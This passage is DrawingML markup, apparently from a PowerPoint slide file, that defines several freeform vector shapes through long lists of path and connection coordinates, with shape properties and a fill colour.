                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83" y="238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87" y="239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93" y="241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99" y="243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112" y="247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125" y="251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133" y="253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138" y="253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144" y="255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152" y="255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157" y="257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165" y="255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171" y="255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176" y="255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184" y="255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190" y="253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196" y="251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203" y="249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209" y="247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215" y="243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220" y="241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228" y="239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234" y="236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239" y="232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245" y="228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251" y="226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256" y="222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262" y="217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268" y="215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273" y="211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279" y="207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289" y="200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296" y="194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304" y="186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310" y="180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315" y="177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319" y="173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321" y="169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319" y="169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315" y="169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310" y="167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302" y="165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296" y="163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287" y="161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279" y="160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270" y="156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262" y="154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253" y="148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245" y="144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237" y="141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224" y="129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220" y="123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215" y="116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211" y="108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209" y="103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="99"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203" y="89"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201" y="83"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201" y="78"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197" y="68"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196" y="57"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194" y="53"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="44"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="38"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190" y="32"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186" y="7"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="25"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171" y="32"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161" y="44"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152" y="53"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146" y="57"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93" y="57"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="49"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70" y="45"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66" y="44"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59" y="38"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53" y="34"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="8A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4520" y="1704"/>
              <a:ext cx="67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1" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="133" y="93"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="101" y="97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3" h="97">
                  <a:moveTo>
                    <a:pt x="0" y="34"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="61" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101" y="97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4670" y="1707"/>
              <a:ext cx="83" cy="112"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="17" y="132"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="17" y="130"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="21" y="128"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="27" y="122"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="35" y="116"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="38" y="111"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="44" y="107"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="48" y="103"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="55" y="99"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="61" y="94"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="67" y="88"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="74" y="82"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="82" y="77"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="90" y="71"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="95" y="63"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="103" y="58"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="111" y="50"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="116" y="44"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="124" y="38"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="131" y="31"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="137" y="27"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="143" y="21"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="149" y="16"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="152" y="10"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="158" y="8"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="164" y="2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0" y="225"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="17" y="132"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="17" y="132"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="166" h="225">
                  <a:moveTo>
                    <a:pt x="17" y="132"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17" y="130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27" y="122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38" y="111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48" y="103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55" y="99"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="94"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67" y="88"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74" y="82"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82" y="77"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90" y="71"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103" y="58"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111" y="50"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="44"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124" y="38"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137" y="27"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149" y="16"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152" y="10"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158" y="38"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="132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15"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4868" y="1672"/>
              <a:ext cx="81" cy="6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4" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="60" y="2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="55" y="6"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="49" y="9"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="41" y="15"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="34" y="23"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="28" y="30"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="22" y="38"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="15" y="46"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="11" y="53"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="5" y="63"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="3" y="70"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2" y="78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2" y="87"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="7" y="87"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="11" y="87"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="17" y="87"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="22" y="87"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="28" y="89"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="34" y="89"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="40" y="89"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="47" y="89"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="55" y="91"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="62" y="91"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="70" y="93"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="76" y="93"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="85" y="97"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="91" y="97"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="97" y="99"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="102" y="101"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="108" y="105"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="112" y="106"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="117" y="106"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="121" y="108"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="125" y="112"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="131" y="114"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="138" y="118"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="140" y="120"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="142" y="120"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="161" y="76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61" h="120">
                  <a:moveTo>
                    <a:pt x="66" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="64" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41" y="15"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="23"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22" y="38"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11" y="53"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2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7" y="87"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11" y="87"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="87"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22" y="87"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28" y="89"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="89"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40" y="89"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47" y="89"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55" y="91"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62" y="91"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="97"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91" y="97"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97" y="99"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102" y="101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108" y="105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112" y="106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117" y="106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121" y="108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125" y="112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138" y="118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161" y="7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16"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5041" y="1679"/>
              <a:ext cx="81" cy="78"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="3" y="113"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="13" y="103"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="24" y="92"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="34" y="82"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="43" y="73"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="55" y="63"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="64" y="52"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="74" y="42"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="83" y="31"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="93" y="23"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="102" y="10"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="112" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="110" y="8"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="108" y="23"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="110" y="38"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="119" y="55"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="134" y="69"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="150" y="80"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="159" y="86"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="159" y="88"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="148" y="90"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="138" y="92"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="127" y="95"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="114" y="99"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="98" y="103"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="83" y="111"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="68" y="116"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="53" y="122"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="39" y="130"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="28" y="137"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="17" y="145"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="9" y="149"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1" y="154"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="3" y="113"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="161" h="156">
                  <a:moveTo>
                    <a:pt x="3" y="113"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3" y="113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7" y="109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13" y="103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="95"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30" y="88"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="82"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39" y="78"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="57"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="52"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70" y="48"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87" y="27"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93" y="23"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102" y="10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0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110" y="16"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108" y="23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5" y="48"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134" y="69"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="80"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155" y="84"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159" y="86"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161" y="88"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159" y="88"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="90"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148" y="90"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127" y="95"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="97"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="99"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83" y="111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68" y="116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53" y="122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47" y="128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39" y="130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28" y="137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22" y="141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13" y="147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="152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3" y="113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="113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5237" y="1663"/>
              <a:ext cx="72" cy="4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2" y="6"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="36" y="8"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="40" y="11"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="46" y="15"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="49" y="19"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="55" y="23"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="61" y="27"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="67" y="28"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="72" y="32"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="78" y="36"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="84" y="38"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="89" y="40"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="95" y="42"/>
                </a:cxn>
